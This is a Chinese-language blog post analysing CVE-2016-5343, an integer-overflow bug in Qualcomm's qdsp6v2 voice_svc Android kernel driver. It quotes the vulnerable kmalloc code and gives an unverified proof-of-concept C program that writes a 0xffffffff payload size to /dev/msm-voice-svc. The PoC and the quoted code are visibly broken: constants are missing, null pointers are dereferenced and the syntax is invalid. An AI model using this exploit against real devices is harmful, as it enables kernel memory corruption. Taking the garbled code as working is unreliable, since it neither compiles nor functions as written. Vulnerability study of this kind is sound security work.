CVE-2016-5343分析

最近在学习android内核漏洞，写篇博做个记录，也算是所学即用。 https://www.codeaurora.org/multiple-memory-corruption-issues-write-operation-qdsp6v2-voice-service-driver-cve-2016-5343,有高通的洞也是潜力无限，漏洞定位到/msm/drivers/soc/qcom/qdsp6v2/voice_svc.c的voice_svc_send_req，可以得知write操作能触发，没有搜到这个洞的poc，看补丁，是个整数溢出,用户控制的payload_size，传入kmalloc函数，payload_size+sizeof(struct apr_data)作为分配大小，于是很明显可产生整数溢出了，实际分配了比期望小很多的内存，后续引用该内存发生不可预期结果。

static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
                  struct voice_svc_prvt *prtd)
{
    int ret = ;
    void *apr_handle = NULL;
    struct apr_data *aprdata = NULL;
    uint32_t user_payload_size = ;

    pr_debug("%s\n", __func__);

    if (apr_request == NULL) {
        pr_err("%s: apr_request is NULL\n", __func__);

        ret = -EINVAL;
        goto done;
    }

    user_payload_size = apr_request->payload_size;//

    aprdata = kmalloc(sizeof(struct apr_data) + user_payload_size,
              GFP_KERNEL);//会分配小于设定值的内存
    if (aprdata == NULL) {
        pr_err("%s: aprdata kmalloc failed.\n", __func__);

        ret = -ENOMEM;
        goto done;
    }

写了个poc，尚未经验证，先记录下，后续实验过后再完善:

 #include <stdlib.h>
 #include <stdio.h>
 #include <unistd.h>
 #include <sys/ioctl.h>
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <fcntl.h>
 #include "voice_svc.h"

 static int open_dev(const char *dev){
     int fd=open(dev,O_RDWR);
     if(fd<){
         printf("failed to open %s\n",dev);
         exit(EXIT_FAILURE);
     }
 }

 int main(void){
     struct voice_svc_write_msg *data=NULL;
     data->msg_type=MSG_REQUEST;
     struct voice_svc_cmd_request *apt_request;
     apt_request->payload_size=0xffffffff;

     data->payload[] = apt_request;
     int fd=-;
     fd=open_dev("/dev/msm-voice-svc");//设备名有待确定
     int ret;
     ret=write(fd,data,(sizeof(*data)+sizeof(struct voice_svc_register)));
     close(fd);
         return ;
 }